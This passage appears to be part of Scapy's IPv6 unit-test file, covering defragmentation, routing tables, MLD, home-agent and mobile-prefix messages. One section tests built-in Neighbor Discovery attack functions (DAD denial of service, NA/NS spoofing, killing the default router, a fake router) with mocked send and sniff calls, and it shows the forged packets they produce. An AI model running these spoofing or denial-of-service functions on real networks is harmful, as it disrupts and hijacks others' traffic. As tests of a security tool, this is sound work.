\x00\xb2\x0f\x00\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + += defragment6 - test the packet length +pkts = fragment6(IPv6()/IPv6ExtHdrFragment()/UDP(dport=42, sport=42)/Raw(load="A"*1500), 1280) +pkts = [IPv6(raw(p)) for p in pkts] +assert defragment6(pkts).plen == 1508 + + +############ +############ ++ Test Route6 class + += Fake interfaces +IFACES._add_fake_iface("eth0") +IFACES._add_fake_iface("lo") +IFACES._add_fake_iface("scapy0") + += Route6 - Route6 flushing +conf_iface = conf.iface +conf.iface = "eth0" +conf.route6.routes=[ +( '::1', 128, '::', 'lo', ['::1'], 1), +( 'fe80::20f:1fff:feca:4650', 128, '::', 'lo', ['::1'], 1)] +conf.route6.flush() +not conf.route6.routes + += Route6 - Route6.route + +conf.route6.flush() +conf.route6.ipv6_ifaces = set(['lo', 'eth0']) +conf.route6.routes=[ +( '::1', 128, '::', 'lo', ['::1'], 1), +( 'fe80::20f:1fff:feca:4650', 128, '::', 'lo', ['::1'], 1), +( 'fe80::', 64, '::', 'eth0', ['fe80::20f:1fff:feca:4650'], 1), +('2001:db8:0:4444:20f:1fff:feca:4650', 128, '::', 'lo', ['::1'], 1), +( '2001:db8:0:4444::', 64, '::', 'eth0', ['2001:db8:0:4444:20f:1fff:feca:4650'], 1), +( '::', 0, 'fe80::20f:34ff:fe8a:8aa1', 'eth0', ['2001:db8:0:4444:20f:1fff:feca:4650', '2002:db8:0:4444:20f:1fff:feca:4650'], 1) +] +assert conf.route6.route("2002::1") == ('eth0', '2002:db8:0:4444:20f:1fff:feca:4650', 'fe80::20f:34ff:fe8a:8aa1') +assert conf.route6.route("2001::1") == ('eth0', '2001:db8:0:4444:20f:1fff:feca:4650', 'fe80::20f:34ff:fe8a:8aa1') +assert conf.route6.route("fe80::20f:1fff:feab:4870") == ('eth0', 'fe80::20f:1fff:feca:4650', '::') +assert conf.route6.route("::1") == ('lo', '::1', '::') +assert conf.route6.route("::") == ('eth0', '2001:db8:0:4444:20f:1fff:feca:4650', 'fe80::20f:34ff:fe8a:8aa1') +assert conf.route6.route('ff00::') == ('eth0', '2001:db8:0:4444:20f:1fff:feca:4650', 'fe80::20f:34ff:fe8a:8aa1') +conf.iface = conf_iface +conf.route6.resync() +if not len(conf.route6.routes): + # IPv6 seems disabled. Force a route to ::1 + conf.route6.routes.append(("::1", 128, "::", conf.loopback_name, ["::1"], 1)) + True + += Route6 - Route6.make_route + +r6 = Route6() +r6.make_route("2001:db8::1", dev=conf.loopback_name) in [ + ("2001:db8::1", 128, "::", conf.loopback_name, [], 1), + ("2001:db8::1", 128, "::", conf.loopback_name, ["::1"], 1) +] +len_r6 = len(r6.routes) + += Route6 - Route6.add & Route6.delt + +r6.add(dst="2001:db8:cafe:f000::/64", gw="2001:db8:cafe::1", dev="eth0") +assert(len(r6.routes) == len_r6 + 1) +r6.delt(dst="2001:db8:cafe:f000::/64", gw="2001:db8:cafe::1") +assert(len(r6.routes) == len_r6) + += Route6 - Route6.ifadd & Route6.ifdel +r6.ifadd("scapy0", "2001:bd8:cafe:1::1/64") +r6.ifdel("scapy0") + += IPv6 - utils + +import mock +@mock.patch("scapy.layers.inet6.get_if_hwaddr") +@mock.patch("scapy.layers.inet6.srp1") +def test_neighsol(mock_srp1, mock_get_if_hwaddr): + mock_srp1.return_value = Ether()/IPv6()/ICMPv6ND_NA()/ICMPv6NDOptDstLLAddr(lladdr="05:04:03:02:01:00") + mock_get_if_hwaddr.return_value = "00:01:02:03:04:05" + return neighsol("fe80::f6ce:46ff:fea9:e04b", "fe80::f6ce:46ff:fea9:e04b", "scapy0") + +p = test_neighsol() +ICMPv6NDOptDstLLAddr in p and p[ICMPv6NDOptDstLLAddr].lladdr == "05:04:03:02:01:00" + + +@mock.patch("scapy.layers.inet6.neighsol") +@mock.patch("scapy.layers.inet6.conf.route6.route") +def test_getmacbyip6(mock_route6, mock_neighsol): + mock_route6.return_value = ("scapy0", "fe80::baca:3aff:fe72:b08b", "::") + mock_neighsol.return_value = test_neighsol() + return getmacbyip6("fe80::704:3ff:fe2:100") + +test_getmacbyip6() == "05:04:03:02:01:00" + += IPv6 - IPerror6 & UDPerror & _ICMPv6Error + +query = IPv6(dst="2001:db8::1", src="2001:db8::2", hlim=1)/UDP()/DNS() +answer = IPv6(dst="2001:db8::2", src="2001:db8::1", hlim=1)/ICMPv6TimeExceeded()/IPerror6(dst="2001:db8::1", src="2001:db8::2", hlim=0)/UDPerror()/DNS() +answer.answers(query) == True + +# Test _ICMPv6Error +from scapy.layers.inet6 import _ICMPv6Error +assert _ICMPv6Error().guess_payload_class(None) == IPerror6 +assert _ICMPv6Error().hashret() == b'' + += Windows: reset routes properly + +if WINDOWS: + from scapy.arch.windows import _route_add_loopback + _route_add_loopback() + +############ +############ ++ ICMPv6ML + += ICMPv6MLQuery - build & dissection +s = raw(IPv6(src="fe80::1")/ICMPv6MLQuery()) +assert s == b"`\x00\x00\x00\x00\x18:\x01\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x82\x00Y\x17'\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + +p = IPv6(s) +assert ICMPv6MLQuery in p and p[IPv6].dst == "ff02::1" + += Check answers + +q = IPv6()/IPv6ExtHdrHopByHop(options=[RouterAlert()])/ICMPv6MLQuery() +a = IPv6()/IPv6ExtHdrHopByHop(options=[RouterAlert()])/ICMPv6MLReport() + +assert a.answers(q) + +############ +############ ++ ICMPv6MLv2 + += ICMPv6MLQuery2 - build & dissection +p = IPv6()/IPv6ExtHdrHopByHop(options=[RouterAlert()])/ICMPv6MLQuery2(sources=["::1"]) +s = raw(p) +assert s == b"`\x00\x00\x00\x004\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01:\x00\x05\x02\x00\x00\x01\x00\x82\x00V\x85'\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01" + +p = IPv6(s) +assert ICMPv6MLQuery2 in p and p.sources_number == 1 + += ICMPv6MLReport2 - build & dissection +p = IPv6()/IPv6ExtHdrHopByHop(options=[RouterAlert()])/ICMPv6MLReport2(records=[ICMPv6MLDMultAddrRec(), ICMPv6MLDMultAddrRec(sources=["::1"], auxdata="scapy")]) +s = raw(p) +assert s == b'`\x00\x00\x00\x00M\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01:\x00\x05\x02\x00\x00\x01\x00\x8f\x00\x1a\xa1\x00\x00\x00\x02\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x05\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01scapy' + +p = IPv6(s) +assert ICMPv6MLReport2 in p and p.records_number == 2 + += ICMPv6MLReport2 and ICMPv6MLDMultAddrRec - dissection + +z = b'33\x00\x00\x00\x16\xd0P\x99V\xdd\xf9\x86\xdd`\x00\x00\x00\x00\x1c:\x01\xfe\x80\x00\x00\x00\x00\x00\x00q eX\x98\x86\xfa\x88\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x16\x8f\x00\x13\x4d\x00\x00\x00\x01\x04\x00\x00\x00\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xffR\xf3\xe1' +w = Ether(z) + +assert len(w.records) == 1 +assert isinstance(w.records[0], ICMPv6MLDMultAddrRec) +assert w.records[0].dst == "ff02::1:ff52:f3e1" + += Check answers + +q = IPv6()/IPv6ExtHdrHopByHop(options=[RouterAlert()])/ICMPv6MLQuery2() +a = IPv6()/IPv6ExtHdrHopByHop(options=[RouterAlert()])/ICMPv6MLReport2() + +assert a.answers(q) + + +############ +############ ++ IPv6 attacks + += Define test utilities + +import mock + +@mock.patch("scapy.layers.inet6.sniff") +@mock.patch("scapy.layers.inet6.sendp") +def test_attack(function, pktlist, sendp_mock, sniff_mock, options=()): + pktlist = [Ether(raw(x)) for x in pktlist] + ret_list = [] + def _fake_sniff(lfilter=None, prn=None, **kwargs): + for p in pktlist: + if lfilter and lfilter(p) and prn: + prn(p) + sniff_mock.side_effect = _fake_sniff + def _fake_sendp(pkt, *args, **kwargs): + ret_list.append(Ether(raw(pkt))) + sendp_mock.side_effect = _fake_sendp + function(*options) + return ret_list + += Test NDP_Attack_DAD_DoS_via_NS + +data = [Ether(src='aa:aa:aa:aa:aa:aa', dst='33:33:ff:00:11:11')/IPv6(src="::", dst="ff02::1:ff00:1111")/ICMPv6ND_NS(tgt="ffff::1111", code=17, res=3758096385), + Ether(src='aa:aa:aa:aa:aa:aa', dst='33:33:ff:5d:c3:53')/IPv6(src="::", dst="ff02::1:ff5d:c353")/ICMPv6ND_NS(tgt="b643:44c3:f659:f8e6:31c0:6437:825d:c353"), + Ether()/IP()/ICMP()] +results = test_attack(NDP_Attack_DAD_DoS_via_NS, data) +assert len(results) == 2 + +a = results[0][IPv6] +assert a[IPv6].src == "::" +assert a[IPv6].dst == "ff02::1:ff00:1111" +assert a[IPv6].hlim == 255 +assert a[ICMPv6ND_NS].tgt == "ffff::1111" + +b = results[1][IPv6] +assert b[IPv6].src == "::" +assert b[IPv6].dst == "ff02::1:ff5d:c353" +assert b[IPv6].hlim == 255 +assert b[ICMPv6ND_NS].tgt == "b643:44c3:f659:f8e6:31c0:6437:825d:c353" + += Test NDP_Attack_DAD_DoS_via_NA + +data = [Ether(src='aa:aa:aa:aa:aa:aa', dst='33:33:ff:00:11:11')/IPv6(src="::", dst="ff02::1:ff00:1111")/ICMPv6ND_NS(tgt="ffff::1111", code=17, res=3758096385), + Ether(src='aa:aa:aa:aa:aa:aa', dst='33:33:ff:5d:c3:53')/IPv6(src="::", dst="ff02::1:ff5d:c353")/ICMPv6ND_NS(tgt="b643:44c3:f659:f8e6:31c0:6437:825d:c353"), + Ether()/IP()/ICMP()] +results = test_attack(NDP_Attack_DAD_DoS_via_NA, data, options=(None, None, None, "ab:ab:ab:ab:ab:ab")) +assert len(results) == 2 +results[0].dst = "ff:ff:ff:ff:ff:ff" +results[1].dst = "ff:ff:ff:ff:ff:ff" + +a = results[0] +assert a[Ether].dst == "ff:ff:ff:ff:ff:ff" +assert a[Ether].src == "ab:ab:ab:ab:ab:ab" +assert a[IPv6].src == "ffff::1111" +assert a[IPv6].dst == "ff02::1:ff00:1111" +assert a[IPv6].hlim == 255 +assert a[ICMPv6ND_NA].tgt == "ffff::1111" +assert a[ICMPv6NDOptDstLLAddr].lladdr == "ab:ab:ab:ab:ab:ab" + +b = results[1] +assert b[Ether].dst == "ff:ff:ff:ff:ff:ff" +assert b[Ether].src == "ab:ab:ab:ab:ab:ab" +assert b[IPv6].src == "b643:44c3:f659:f8e6:31c0:6437:825d:c353" +assert b[IPv6].dst == "ff02::1:ff5d:c353" +assert b[IPv6].hlim == 255 +assert b[ICMPv6ND_NA].tgt == "b643:44c3:f659:f8e6:31c0:6437:825d:c353" +assert b[ICMPv6NDOptDstLLAddr].lladdr == "ab:ab:ab:ab:ab:ab" + += Test NDP_Attack_NA_Spoofing + +data = [Ether(src='aa:aa:aa:aa:aa:aa', dst='33:33:ff:d4:e5:f6')/IPv6(src="753a:727c:97b5:f71d:51ea:3901:ab52:e110", dst="ff02::1:ffd4:e5f6")/ICMPv6ND_NS(tgt="ff02::1:ffd4:e5f6", code=171, res=3758096), + Ether(src='aa:aa:aa:aa:aa:aa', dst='33:33:e4:68:c9:4f')/IPv6(src="753a:727c:97b5:f71d:51ea:3901:ab52:e110", dst="fe9c:98b0:52b5:7033:5db0:394f:e468:c94f")/ICMPv6ND_NS(), + Ether()/IP()/ICMP()] +results = test_attack(NDP_Attack_NA_Spoofing, data, options=(None, None, None, "ff:ff:ff:ff:ff:ff", None)) +assert len(results) == 2 + +a = results[0] +assert a[Ether].dst == "aa:aa:aa:aa:aa:aa" +assert a[Ether].src == "ff:ff:ff:ff:ff:ff" +assert a[IPv6].src == "ff02::1:ffd4:e5f6" +assert a[IPv6].dst == "753a:727c:97b5:f71d:51ea:3901:ab52:e110" +assert a[IPv6].hlim == 255 +assert a[ICMPv6ND_NA].R == 0 +assert a[ICMPv6ND_NA].S == 1 +assert a[ICMPv6ND_NA].O == 1 +assert a[ICMPv6ND_NA].tgt == "ff02::1:ffd4:e5f6" +assert a[ICMPv6NDOptDstLLAddr].lladdr == "ff:ff:ff:ff:ff:ff" + +b = results[1] +assert b[Ether].dst == "aa:aa:aa:aa:aa:aa" +assert b[Ether].src == "ff:ff:ff:ff:ff:ff" +assert b[IPv6].src == "::" +assert b[IPv6].dst == "753a:727c:97b5:f71d:51ea:3901:ab52:e110" +assert b[IPv6].hlim == 255 +assert b[ICMPv6ND_NA].R == 0 +assert b[ICMPv6ND_NA].S == 1 +assert b[ICMPv6ND_NA].O == 1 +assert b[ICMPv6ND_NA].tgt == "::" +assert b[ICMPv6NDOptDstLLAddr].lladdr == "ff:ff:ff:ff:ff:ff" + += Test NDP_Attack_Kill_Default_Router + +data = [Ether(src='aa:aa:aa:aa:aa:aa', dst='33:33:ff:d4:e5:f6')/IPv6(src="753a:727c:97b5:f71d:51ea:3901:ab52:e110", dst="ff02::1:ffd4:e5f6")/ICMPv6ND_RA(routerlifetime=1), + Ether(src='aa:aa:aa:aa:aa:aa', dst='33:33:ab:52:e1:10')/IPv6(src="fe9c:98b0:52b5:7033:5db0:394f:e468:c94f", dst="753a:727c:97b5:f71d:51ea:3901:ab52:e110")/ICMPv6ND_RA(routerlifetime=1), + Ether()/IP()/"RANDOM"] +results = test_attack(NDP_Attack_Kill_Default_Router, data) +assert len(results) == 2 + +a = results[0][IPv6] +assert a[IPv6].src == "753a:727c:97b5:f71d:51ea:3901:ab52:e110" +assert a[IPv6].dst == "ff02::1" +assert a[IPv6].hlim == 255 +assert a[ICMPv6ND_RA].M == 0 +assert a[ICMPv6ND_RA].O == 0 +assert a[ICMPv6ND_RA].H == 0 +assert a[ICMPv6ND_RA].P == 0 +assert a[ICMPv6ND_RA].routerlifetime == 0 +assert a[ICMPv6ND_RA].reachabletime == 0 +assert a[ICMPv6ND_RA].retranstimer == 0 +assert a[ICMPv6NDOptSrcLLAddr].lladdr == "aa:aa:aa:aa:aa:aa" + +b = results[1][IPv6] +assert b[IPv6].src == "fe9c:98b0:52b5:7033:5db0:394f:e468:c94f" +assert b[IPv6].dst == "ff02::1" +assert b[IPv6].hlim == 255 +assert b[ICMPv6ND_RA].M == 0 +assert b[ICMPv6ND_RA].O == 0 +assert b[ICMPv6ND_RA].H == 0 +assert b[ICMPv6ND_RA].P == 0 +assert b[ICMPv6ND_RA].routerlifetime == 0 +assert b[ICMPv6ND_RA].reachabletime == 0 +assert b[ICMPv6ND_RA].retranstimer == 0 +assert b[ICMPv6NDOptSrcLLAddr].lladdr == "aa:aa:aa:aa:aa:aa" + += Test NDP_Attack_Fake_Router + +ra = Ether()/IPv6()/ICMPv6ND_RA() +ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64) +ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64) +ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55") + +rad = Ether(raw(ra)) + +data = [Ether(src='aa:aa:aa:aa:aa:aa', dst='33:33:ab:52:e1:10')/IPv6(src="753a:727c:97b5:f71d:51ea:3901:ab52:e110", dst="ff02::1:ffd4:e5f6")/ICMPv6ND_RS(code=11, res=3758096), + Ether(src='aa:aa:aa:aa:aa:aa', dst='33:33:ab:52:e1:10')/IPv6(src="753a:727c:97b5:f71d:51ea:3901:ab52:e110", dst="fe9c:98b0:52b5:7033:5db0:394f:e468:c94f")/ICMPv6ND_RS(), + Ether()/IP()/ICMP()] +results = test_attack(NDP_Attack_Fake_Router, data, options=(ra,)) +assert len(results) == 2 + +assert results[0] == rad +assert results[1] == rad + += Test NDP_Attack_NS_Spoofing + +r = test_attack(NDP_Attack_NS_Spoofing, [], options=("aa:aa:aa:aa:aa:aa", "753a:727c:97b5:f71d:51ea:3901:ab52:e110", "2001:db8::1", 'e4a0:654b:1a24:1b15:761d:2e5d:245d:ba83', "cc:cc:cc:cc:cc:cc", "dd:dd:dd:dd:dd:dd"))[0] + +assert r[Ether].dst == "dd:dd:dd:dd:dd:dd" +assert r[Ether].src == "cc:cc:cc:cc:cc:cc" +assert r[IPv6].hlim == 255 +assert r[IPv6].src == "753a:727c:97b5:f71d:51ea:3901:ab52:e110" +assert r[IPv6].dst == "e4a0:654b:1a24:1b15:761d:2e5d:245d:ba83" +assert r[ICMPv6ND_NS].tgt == "2001:db8::1" +assert r[ICMPv6NDOptSrcLLAddr].lladdr == "aa:aa:aa:aa:aa:aa" + +# Below is our Homework : here is the mountain ... +# + +########### ICMPv6MLReport Class #################################### +########### ICMPv6MLDone Class ###################################### +########### ICMPv6ND_Redirect Class ################################# +########### ICMPv6NDOptSrcAddrList Class ############################ +########### ICMPv6NDOptTgtAddrList Class ############################ +########### ICMPv6ND_INDSol Class ################################### +########### ICMPv6ND_INDAdv Class ################################### + +############ +############ ++ Home Agent Address Discovery + += in6_getha() +in6_getha('2001:db8::') == '2001:db8::fdff:ffff:ffff:fffe' + += ICMPv6HAADRequest - build/dissection +p = IPv6(raw(IPv6(dst=in6_getha('2001:db8::'), src='2001:db8::1')/ICMPv6HAADRequest(id=42))) +p.cksum == 0x9620 and p.dst == '2001:db8::fdff:ffff:ffff:fffe' and p.R == 1 + += ICMPv6HAADReply - build/dissection +p = IPv6(raw(IPv6(dst='2001:db8::1', src='2001:db8::42')/ICMPv6HAADReply(id=42, addresses=['2001:db8::2', '2001:db8::3']))) +p.cksum = 0x3747 and p.addresses == [ '2001:db8::2', '2001:db8::3' ] + += ICMPv6HAADRequest / ICMPv6HAADReply - build/dissection +a=ICMPv6HAADRequest(id=42) +b=ICMPv6HAADReply(id=42) +not a < b and a > b + + +############ +############ ++ Mobile Prefix Solicitation/Advertisement + += ICMPv6MPSol - build (default values) + +s = b'`\x00\x00\x00\x00\x08:@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x92\x00m\xbb\x00\x00\x00\x00' +raw(IPv6()/ICMPv6MPSol()) == s + += ICMPv6MPSol - dissection (default values) +p = IPv6(s) +p[ICMPv6MPSol].type == 146 and p[ICMPv6MPSol].cksum == 0x6dbb and p[ICMPv6MPSol].id == 0 + += ICMPv6MPSol - build +s = b'`\x00\x00\x00\x00\x08:@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x92\x00(\x08\x00\x08\x00\x00' +raw(IPv6()/ICMPv6MPSol(cksum=0x2808, id=8)) == s + += ICMPv6MPSol - dissection +p = IPv6(s) +p[ICMPv6MPSol].cksum == 0x2808 and p[ICMPv6MPSol].id == 8 + += ICMPv6MPAdv - build (default values) +s = b'`\x00\x00\x00\x00(:@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x93\x00\xa8\xd6\x00\x00\x80\x00\x03\x04@\xc0\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +raw(IPv6()/ICMPv6MPAdv()/ICMPv6NDOptPrefixInfo()) == s + += ICMPv6MPAdv - dissection (default values) +p = IPv6(s) +p[ICMPv6MPAdv].type == 147 and p[ICMPv6MPAdv].cksum == 0xa8d6 and p[ICMPv6NDOptPrefixInfo].prefix == '::' + += ICMPv6MPAdv - build +s = b'`\x00\x00\x00\x00(:@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x93\x00(\x07\x00*@\x00\x03\x04@@\xff\xff\xff\xff\x00\x00\x00\x0c\x00\x00\x00\x00 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' +raw(IPv6()/ICMPv6MPAdv(cksum=0x2807, flags=1, id=42)/ICMPv6NDOptPrefixInfo(prefix='2001:db8::1', L=0, preferredlifetime=12)) == s + += ICMPv6MPAdv - dissection +p = IPv6(s) +p[ICMPv6MPAdv].cksum == 0x2807 and p[ICMPv6MPAdv].flags == 1 and p[ICMPv6MPAdv].id == 42 and p[ICMPv6NDOptPrefixInfo].prefix == '2001:db8::1' and p[ICMPv6NDOptPrefixInfo].preferredlifetime == 12 + + +############ +############ ++ Type 2 Routing Header + += IPv6ExtHdrRouting - type 2 - build/dissection +p = IPv6(raw(IPv6(dst='2001:db8::1', src='2001:db8::2')/IPv6ExtHdrRouting(type=2, addresses=['2001:db8::3'])/ICMPv6EchoRequest())) +p.type == 2 and len(p.addresses) == 1 and p.cksum == 0x2446 + += 